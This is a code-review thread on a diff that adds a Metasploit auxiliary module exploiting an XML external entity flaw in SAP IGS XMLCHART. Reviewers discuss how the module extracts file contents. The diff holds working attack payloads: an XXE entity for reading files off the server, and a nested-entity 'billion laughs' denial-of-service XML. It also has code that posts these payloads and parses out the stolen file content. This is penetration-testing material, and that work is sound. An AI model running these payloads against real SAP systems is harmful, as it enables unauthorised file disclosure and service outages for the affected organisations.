modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb

```diff
@@ -0,0 +1,332 @@
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&#{entity};</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>)
+  end
+
+  def make_post_data(file_name, dos = false)
+    setup_xml_and_variables
+
+    if !dos
+      make_xxe_xml(file_name)
+    else
+      @xxe_xml[:data] = %(<?xml version='1.0' encoding='UTF-8'?>
+    <!DOCTYPE Extension [
+      <!ENTITY dos 'dos'>
+      <!ENTITY dos1 '&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;&dos;'>
+      <!ENTITY dos2 '&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;&dos1;'>
+      <!ENTITY dos3 '&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;&dos2;'>
+      <!ENTITY dos4 '&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;&dos3;'>
+      <!ENTITY dos5 '&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;&dos4;'>
+      <!ENTITY dos6 '&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;&dos5;'>
+      <!ENTITY dos7 '&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;&dos6;'>
+      <!ENTITY dos8 '&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;&dos7;'>
+    ]>
+    <SAPChartCustomizing version="1.1">
+      <Elements>
+        <ChartElements>
+          <Title>
+            <Extension>&dos8;</Extension>
+          </Title>
+        </ChartElements>
+      </Elements>
+    </SAPChartCustomizing>)
+    end
+
+    @post_data = Rex::MIME::Message.new
+    @post_data.add_part(@data_xml[:data], 'application/xml', nil, "form-data; name=\"#{@data_xml[:name]}\"; filename=\"#{@data_xml[:filename]}\"")
+    @post_data.add_part(@xxe_xml[:data], 'application/xml', nil, "form-data; name=\"#{@xxe_xml[:name]}\"; filename=\"#{@xxe_xml[:filename]}\"")
+  end
+
+  def get_download_link(html_response)
+    if html_response['ImageMap']
+      if (download_link_regex = html_response.match(/ImageMap" href="(?<link>.*)">ImageMap/))
+        @download_link = download_link_regex[:link]
+      else
+        @download_link = nil
+      end
+    else
+      @download_link = nil
+    end
+  end
+
+  def get_file_content(html_response)
+    file_content = html_response.gsub('<area shape=rect coords="0, 0,0, 0" ', '')
+    @file_content = file_content.gsub('>', '')
```

Comment:
A much better approach to this would be to use `file_content.match(/^<area shape=rect coords="0, 0,0, 0" ([^\b]+?)>$/)[1]`. Your current solution will end up removing all `>`'s from the file even when this isn't desired, and there is also a possibility that `<area shape=rect coords="0, 0,0, 0"` could legitimately exist elsewhere within the file, which will also result in all instances of it being removed from the file's content.

Reply:
https://github.com/rapid7/metasploit-framework/blob/a7d407c89a4140403771c5c3b3419d1fc5eb62f1/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb#L149

Reply:
Woops nearly got it but this will actually return an array of all matches, as this is what the `match` function does. You forgot the [1] part to get the grouping inside the (), aka the specific results we are interested in.

Reply:
Also in that regex, trying to do <file_content> will attempt to literally match on the string `<file_content>` which will never appear in the output and thus you will never actually get any results.

Reply:
Woops sorry for the extra comments, after further verification this is fine.